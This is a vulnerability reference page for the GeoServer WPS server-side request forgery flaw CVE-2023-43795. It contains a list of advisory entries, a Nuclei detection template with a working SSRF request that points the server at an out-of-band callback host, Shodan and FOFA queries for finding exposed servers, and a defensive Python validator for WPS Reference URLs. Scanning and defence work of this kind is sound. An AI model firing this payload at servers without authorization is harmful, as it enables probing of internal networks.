| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2023-43795 | 31 Jan 2025 00:00 | – | circl |
| GeoServer code issue vulnerability | 25 Oct 2023 00:00 | – | cnnvd |
| GeoServer server-side request forgery vulnerability (CNVD-2024-14588) | 30 Oct 2023 00:00 | – | cnvd |
| CVE-2023-43795 | 24 Oct 2023 22:14 | – | cve |
| CVE-2023-43795 WPS Server Side Request Forgery in GeoServer | 24 Oct 2023 22:14 | – | cvelist |
| WPS Server Side Request Forgery vulnerability | 24 Oct 2023 19:21 | – | github |
| CVE-2023-43795 | 25 Oct 2023 18:17 | – | nvd |
| CVE-2023-43795 WPS Server Side Request Forgery in GeoServer | 24 Oct 2023 22:14 | – | osv |
| GHSA-5PR3-M5HM-9956 WPS Server Side Request Forgery vulnerability | 24 Oct 2023 19:21 | – | osv |
| Server side request forgery (ssrf) | 25 Oct 2023 18:17 | – | prion |

```yaml
id: CVE-2023-43795

info:
  name: GeoServer WPS - Server Side Request Forgery
  author: DhiyaneshDK
  severity: critical
  description: |
    GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.
  impact: |
    Unauthenticated attackers can exploit SSRF through the WPS service to make arbitrary HTTP requests and access internal network resources, potentially compromising the entire GeoServer infrastructure and accessing sensitive geospatial data.
  remediation: |
    Update GeoServer to version 2.22.5 or 2.23.2 or later that validates URLs in WPS requests and restricts access to authorized external resources only.
  reference:
    - https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms.html
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-5pr3-m5hm-9956
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43795
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43795
    cwe-id: CWE-918
    epss-score: 0.67715
    epss-percentile: 0.99228
    cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"GeoServer"
      - http.title:"geoserver"
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
      - title="geoserver"
    google-query: intitle:"geoserver"
  tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo,vkev,vuln

variables:
  oast: "{{interactsh-url}}"
  string: "{{to_lower(rand_text_alpha(4))}}"
  value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <wps:Execute version="1.0.0" service="WPS"
          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
          xmlns="http://www.opengis.net/wps/1.0.0"
          xmlns:wfs="http://www.opengis.net/wfs"
          xmlns:wps="http://www.opengis.net/wps/1.0.0"
          xmlns:ows="http://www.opengis.net/ows/1.1"
          xmlns:gml="http://www.opengis.net/gml"
          xmlns:ogc="http://www.opengis.net/ogc"
          xmlns:wcs="http://www.opengis.net/wcs/1.1.1"
          xmlns:xlink="http://www.w3.org/1999/xlink"
          xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
          <ows:Identifier>JTS:area</ows:Identifier>
          <wps:DataInputs>
            <wps:Input>
              <ows:Identifier>geom</ows:Identifier>
              <wps:Reference mimeType="application/json" xlink:href="https://{{oast}}" method="GET">
                <wps:Header key="{{string}}" value="{{value}}"/>
              </wps:Reference>
            </wps:Input>
          </wps:DataInputs>
          <wps:ResponseForm>
            <wps:RawDataOutput>
              <ows:Identifier>result</ows:Identifier>
            </wps:RawDataOutput>
          </wps:ResponseForm>
        </wps:Execute>

    payloads:
      path:
        - /wms
        - /geoserver/wms

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100ebccec1386c67a71b4045a062ade824a17d1fbab2aaef6215abbe6851ecf08bc0221009cd62dcd89816d1ae35fb5aaae6f255f22960f4bdcf34dcb3b128a8a4c0b69b1:922c64590222798bb761d5b6d8e72950
```
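
A defensive check for the request shape this template sends, added here as an example (it is not part of the template or of GeoServer): it parses a WPS Execute body and reports every `wps:Reference` target that is not plain HTTP(S), is an internal address, or is missing from an allowlist. The function names, `ALLOWED_HOSTS` and the sample body are assumptions constructed for illustration.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

WPS_REF = "{http://www.opengis.net/wps/1.0.0}Reference"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
ALLOWED_HOSTS = {"data.example.org"}  # assumption: this site's approved input sources

def is_internal(host):
    """True for localhost and for literal loopback, private or link-local addresses."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost" or host.endswith(".localhost")
    return ip.is_loopback or ip.is_private or ip.is_link_local

def audit_wps_execute(body, allowed_hosts=ALLOWED_HOSTS):
    """Return (href, reason) for every wps:Reference the server should not fetch.

    This inspects the literal host only; a DNS name that resolves to an internal
    address still has to be caught where the outbound request is made.
    """
    findings = []
    for ref in ET.fromstring(body).iter(WPS_REF):
        href = ref.get(XLINK_HREF, "")
        parts = urlsplit(href)
        host = (parts.hostname or "").lower()
        if parts.scheme not in ("http", "https"):
            findings.append((href, "scheme not allowed"))
        elif is_internal(host):
            findings.append((href, "internal address"))
        elif host not in allowed_hosts:
            findings.append((href, "host not on allowlist"))
    return findings

# Constructed sample body (not captured traffic): three remote inputs.
SAMPLE_BODY = """<wps:Execute version="1.0.0" service="WPS"
    xmlns:wps="http://www.opengis.net/wps/1.0.0"
    xmlns:xlink="http://www.w3.org/1999/xlink">
  <wps:DataInputs>
    <wps:Input><wps:Reference xlink:href="https://data.example.org/geom.json" method="GET"/></wps:Input>
    <wps:Input><wps:Reference xlink:href="http://10.0.0.5:8080/status" method="GET"/></wps:Input>
    <wps:Input><wps:Reference xlink:href="https://unlisted.example.net/geom.json" method="GET"/></wps:Input>
  </wps:DataInputs>
</wps:Execute>"""

if __name__ == "__main__":
    for href, reason in audit_wps_execute(SAMPLE_BODY):
        print(f"{reason}: {href}")
```
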